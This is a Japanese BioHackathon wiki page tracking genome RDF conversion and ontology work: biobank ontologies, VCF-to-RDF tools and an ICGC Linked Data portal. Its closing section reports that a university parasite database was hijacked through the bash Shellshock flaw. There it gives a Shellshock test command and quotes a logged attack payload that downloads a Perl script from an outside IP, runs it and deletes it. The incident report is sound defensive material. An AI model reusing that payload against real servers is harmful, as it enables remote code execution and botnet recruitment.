BH14.14/genomeRDF

提供:TogoWiki

移動: 案内, 検索

INSDC, MEO, MPO, MCCV などのオントロジー開発

  • 培地オントロジーの更新(川島)
  • 表現型オントロジー
  • INSDCオントロジー更新(藤澤・真島)
  • 東北メディカル・メガバンク (ToMMo) と日本人ゲノム情報
    • バイオバンクデータのオントロジー整理(山下、河野、高月、伊藤)
      • http://www.jbiomedsem.com/content/4/1/23
      • 実態: 血漿、PaxGene、単核球、尿、DNA、唾液、唾液上清、唾液ペレット、舌苔、歯垢右、歯垢左
      • 時間情報: 受け入れ時間、血漿分離時間、バイオバンク納入時間、出庫時間
      • 質、量: 在庫量、DNA濃度、血液型
    • 理研BRC、東北メディカル・メガバンク、DBTSSのデータの統合の可能性についてミーティング
      • DBTSS - 理研BRC → 細胞種で結べる
      • 理研BRC - 東北メディカル・メガバンク → 短期的は難しいかも・・・、臍帯血、単核球
  • 植物研究コミュニティで使用する統一用語を効率的に整備するためのシステム作り(Wikiページの作成とオプティマイズ)(市原)
    • MediaWIkiの利用による機能拡張作業(php)

RDF化

  • RNA-seq メタデータ -- 菅野・黒川グループ、(藤澤、河野)
    • RNA-Seq/Cufflinks RDFデータモデル
    • SRA/RNA-SeqのINSDC SRAエントリ - リファレンスゲノム :assembly reportエントリの網羅的 リンクセット生成(藤澤・望月)
  • 疾患ヒトゲノム変異 (TSS、SNVデータ) のRDF化(鈴木、川島、河野、山下)
    • TSSデータのRDF化
    • 解析の記述
    • SNVデータのRDF化
      • DBTSS SNV RDF スキーマ
      • SNV RDF
      • vcf ファイルを RDF に変換するツール
        • bio-vcf2rdf
          • Francesco Strozzi, FALDO 対応、最終更新は2年前
        • bio-vcf
          • Pjotr Prins, FALDO 非対応?、割と活発に開発されている
          • 問題点:位置情報がFALDOでない。prefixが書けない。テンプレートを使うと、値がないものがトリプルにならない(if 文で区別できる)。
          • サンプルコードが動かない…
        • jvarkit
          • vcf ファイルを扱うライブラリ集?VCFTORDFがある。
          • 746MB vcf file -> 4.56 GB, 1h (1.6GHz Intel core 2 Duo)
        • biointerchange
        • syapse
          • Private company っぽい。W3C clinical genomics task force?
        • sparql-vcf
          • Simon Jupp
      • というか、BH13.13 で既に議論されていた…
    • ユースケースとして、RDF 化したものを他のデータとも統合的に検索できる例を出したい
  • ライフサイエンス〜創薬におけるセマンティック・ウェブの活用
  • がんゲノム ICGC Linked Data ポータルの開発 http://icgc.link/ (山中)
    • (進捗90%) 現状、d3sparql に加えて Faceted Search 追加 >> 将来的に必要な Visualization を考える
      • Faceted Search をモジュール化する。Open Refine の UI が参考にできる?
    • (進捗20%) 外部ソースのRDFをポータルに含めて表示する:現在、BIO2RDFのHGNCのみ。他にどんなソースがあるか、日本人SNPsのデータは?
      • 上記、VCFのRDF化で日本人SNPsのRDFデータが得られたら、これを参照できるようにしたい。
    • (進捗00%) RDFデータを規約に従って修正、上記ポータルのレポジトリに公開
    • [広告] Galaxy Workshop Tokyo 2015
  • RefEx RDF化(川島・小野)
  • NBRC菌株のBioSample ID取得に向けた作業(Taxonomy ID付け)(川島・真島・藤澤)
  • GO 情報の追加(PDBe/SIFTS経由)(金城)
  • マウスの基本情報のRDF化作業(高月,伊藤)
  • 細胞の基本情報のRDF化作業(高月、河野)
    • CLOにそった、スキーマーの設計を行っている。
    • BRCの細胞については、採取組織についてはUBELONを利用してマッピングする予定
    • 細胞の提供者(人)の場合の国については、geonames.orgを利用するのがよいのでは?
    • 細胞のデータについては、一部菅野研のデータと結ぶことが可能。
    • 細胞データの病名については、わかる範囲で、ICD10や、OMIMとつなぐが、難病疾患については、ORDOとつないでいける
  • 微生物データのデータ連携のフローの作成(高月)→次回のSPARQLthonに持ち越します。
  • 遺伝研のコンソミックマウスについては、一部基本データー部分をRDF化

北大のTheileria Orientalis database

  • おかげさまで現在,復旧しました。Theileria orientalis database
  • 2012年8月にゲノムプロジェクトの成果として,論文発表と同時にシークエンスとアノテーションDBを公開
  • 2014年の年末,DDoS攻撃に参加したためサービス中止,ネットワークから分離
  • 2015年の1月,このデータベースを使った論文がNatureに出版されたが,ネットワークに接続するわけにはいかない。
  • 原因: bash の脆弱性をつかれ,perlスクリプトが仕込まれていた。
  • とりあえず復旧させたが,再構築を検討してます。アイディア募集中です!
  • 脆弱性のテスト
env -i x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  • ログ
132.239.152.97 - - [05/Oct/2014:22:38:31 +0900] "GET /g-integra/cgi-bin/gi_index.cgi?sp0=To HTTP/1.1" 500 622 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""
個人用ツール